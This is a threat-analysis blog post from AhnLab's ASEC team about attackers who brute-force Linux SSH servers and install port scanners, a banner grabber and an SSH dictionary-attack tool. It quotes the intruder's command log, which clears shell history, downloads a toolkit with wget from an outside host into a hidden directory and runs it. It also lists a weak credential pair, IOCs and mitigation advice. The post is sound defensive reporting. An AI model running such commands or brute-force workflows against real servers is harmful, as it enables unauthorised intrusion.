Analysis of Attacks That Install Scanners on Linux SSH Servers – ASEC BLOG

AhnLab Security Emergency response Center (ASEC) analyzes attack campaigns against poorly managed Linux SSH servers and shares the results on the ASEC Blog. Before installing malware such as DDoS bot and CoinMiner, the threat actors need to obtain information on the attack target, that is the IP address and SSH account credentials. IP scanning is performed for this purpose to look for servers with the SSH service, or port 22 activated, after which a brute force or dictionary attack is launched to obtain the ID and password.

Threat actors can mine more cryptocurrency the more CoinMiners they control. They can also launch more powerful DDoS attacks the more DDoS bots they control. However, to install more CoinMiners and DDoS bots, they must procure as much information, or account credentials, from their targets.

Thus, besides DDoS bots and CoinMiners, threat actors can also install malware that perform such scanning and brute force or dictionary attacks in infected systems, which allows them to take advantage of more vulnerable systems. Threat actors can also choose to install only scanners and sell the breached IP and account credentials on the dark web.

In conclusion, there are cases where SSH scanner malware is installed on poorly managed SSH servers, in addition to DDoS bots and CoinMiners. This post provides an analysis of attack cases where these malware were installed.

1. Malware Targeting Linux SSH Servers

Common malware that are installed in attacks against poorly managed Linux SSH servers include ShellBot [1] [2], Tsunami [3], ChinaZ DDoS Bot [4], and XMRig CoinMiner [5]. Of course, various other known malware are also used in attacks. AhnLab TIP provides quarterly statistics on attacks and malware.

Figure 1. Classification of malware targeting Linux SSH servers in Q3 2023

Before installing malware, threat actors use an ID and password list as shown below to attempt to log into Linux servers with the SSH service activated. When the attempt is successful, they install the malware. The recently identified threat actor installed other scanners instead of malware after obtaining the account credentials. This is believed to be for the purpose of procuring more vulnerable systems.

Figure 2. ID and password list used in a past Tsunami DDoS bot attack campaign

2. SSH Brute Force Attack Campaign

The threat actor used a scanner to scan for systems where port 22 (SSH service) is active and then used the account credentials obtained with an SSH dictionary attack tool to install malware. The ID and password used in the attack are as follows.

User Password Attacker IP
root Password1234 217.156.4[.]2
Table 1. Threat actor’s IP address and account credentials used in the attacks

After successful login, the threat actor first executed the following command to check the total number of CPU cores. This command is the one that is executed after successful login using the SSH dictionary attack tool “prg”. More details on this will be provided further on.

> grep -c ^processor /proc/cpuinfo

The execution of this command signifies that the threat actor has obtained the account credentials. Afterward, the threat actor logged in again using the same account credentials and downloaded a compressed file. The compressed file contains a port scanner and an SSH dictionary attack tool. Additionally, commands accidentally typed by the threat actor can be seen, such as “cd /ev/network” and “unaem 0a”.

> unset HISTFILE
> w
> ls -a
> ps ax
> wget 58.216.207[.]82/scan.tar
> ls -a
> mdkri /dev/network
> mkdir /dev/network
> mv scan.tar /dev/network
> cd /ev/network
> cd /dev/network
> ls -a
> unaem 0a
> uname -a
> tar -xvf scan.tar
> cd .stx/
> ls -a
> ./go 212
> cd ..
> ls -a
> rm -rf scan.tar
> ls -a

3. Analysis of Malware Used in Attack

Filename Description
go Scanner script (IP A class)
gob Scanner script (IP B class)
rand Scanner script (Executes gob on a random IP B class band)
ps Port Scanner
ps2 Port Scanner
b Banner Grabber
prg SSH brute force tool
Table 2. List of malware used in the attack

The threat actor executed a Bash script named “go” with the argument “212”. The “go” script is responsible for launching the port scanner, banner grabber, and SSH dictionary attack tool in order.

Figure 3. Scanner script “go”

When the port scanner is launched, the IP band and port number to scan for must be given as arguments. The port number is set to 22 (SSH) and the transmitted IP band value is used for the IP A class band.

Figure 4. Main execution routine

The “gob” script is similar to the “go” script, with the difference being that an IP B class is given as an argument. While the threat actor manually designated an IP A class and executed the “go” script, they could have designated an IP B class and executed the “gob” or “rand” script. The “rand” script differs from the “gob” script in the fact that an arbitrary IP B class is designated upon execution.

Either “ps” or “ps2” is used as the port scanner, which are both tools that are given an IP band and port number to scan for. A notable fact is that when a system with the target port activated is found, the results, that is the IP address list, are saved in a file with the name “bios.txt” in the same path.

Figure 5. How port scanners are used (ps and ps2)

Afterward, “b” is executed after “bios.txt” containing the list of IP addresses created in the previous step, the port number, and the number of scanning threads are given as arguments. The banner grabber “b” connects to the given IP address and port number to grab banners, which it creates under the name “banner.log” in the same path. The “go” script extracts a list of IPs with the string “SSH-2.0-OpenSSH” from the file and saves them in a file named “ips.lst”.

The ultimately executed “prg” is an SSH dictionary attack tool. It reads IP addresses from the file “ips.lst” to be a target for brute force attacks, and from the “pass.lst” file, it reads the ID and password list to be used for a dictionary attack. The file “ips.lst” contains the list of IPs obtained through scanning processes so far. The file “pass.lst” is located within the “scan.tar” compressed file. If the threat actor logs in successfully through a dictionary attack, the result is saved in a file named “ssh_vuln”.

Figure 6. Files created as a result of an SSH dictionary attack

After logging in through a dictionary attack, the “prg” tool executes the “grep -c ^processor /proc/cpuinfo” command, finding the total number of CPU cores and displaying it in the Nproc entry as shown below. This command is the same as the command above that was executed first. Thus, it is deemed that after the threat actor used the same tools to scan and obtain account credentials, they logged in to the target system and installed the same scanner and SSH dictionary attack tools.

Figure 7. Results shown after successful dictionary attack

4. Past Attack Cases

Additionally, files within the “scan.tar” file used in the attacks, such as the port scanner and SSH dictionary attack tool, have been used by various threat actors before. While each threat actor uses slightly different tools and files such as the list of account credentials, the attack flows are almost the same.

Figure 8. Tools used in past attacks

These tools are believed to have been created by PRG old Team, and each threat actor modifies them slightly before using them in attacks. The report released by the Japan Computer Emergency Response Team Coordination Center (JPCERT/CC) in 2021 also mentions that a threat actor that installed the XMRig CoinMiner additionally installed a port scanner and an SSH dictionary attack tool. Tools created by the PRG old Team were also used in this case. [6]

Figure 9. go scripts used in attacks

5. Conclusion

Recently, threat actors have been installing port scanners and SSH dictionary attack tools on poorly managed Linux SSH servers. Threat actors use these tools to procure more SSH servers, which can allow them to install additional malware such as DDoS bots and CoinMiners afterward.

Because of this, administrators should use passwords that are difficult to guess for their accounts and change them periodically to protect the Linux server from brute force attacks and dictionary attacks and update to the latest patch to prevent vulnerability attacks. Administrators should also use security programs such as firewalls for servers that are accessible from the outside to restrict access from threat actors. Finally, caution must be practiced by updating V3 to the latest version to block malware infection in advance.

ASEC uses a Linux SSH Honeypot to collect these attack source addresses in real time. The identified attack source addresses are provided through AhnLab TIP.

Figure 10. Threat IOCs page on AhnLab TIP

File Detection
– Trojan/Shell.Scanner.SC195356 (2023.12.14.03)
– Trojan/Shell.Scanner.SC195357 (2023.12.14.03)
– Trojan/Shell.Scanner.SC195396 (2023.12.15.03)
– HackTool/Linux.Sshbrute.2121276 (2023.12.14.03)
– HackTool/Linux.Scanner.673120 (2020.04.07.08)
– HackTool/Linux.Portscan.SE157 (2020.04.21.00)
– HackTool/Linux.Scanner.458020 (2023.12.14.03)

IOC
MD5

– db1fd9c0ccc6aea1176d219ff5d7fd01 : Scanner Bash Script (go)
– 6fe6cc7c88cf1a0c20727a03d2577c04 : Scanner Bash Script (gob)
– 03b23be96901764867da50dcd48c96dd : Scanner Bash Script (rand)
– edc91faa16aa3e5b3d7303b2a276d23d : Port Scanner (ps)
– 946689ba1b22d457be06d95731fcbcac : Port Scanner (ps2)
– 45901e5b336fd0eb79c6decb8e9a69cb : Banner Grabber (b)
– dfa3dcb5b825f5622e54bd09be73b6ed : SSH Bruteforcer (prg)

Download
– hxxp://58.216.207[.]82/scan.tar

Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.

Source: https://asec.ahnlab.com/en/59972/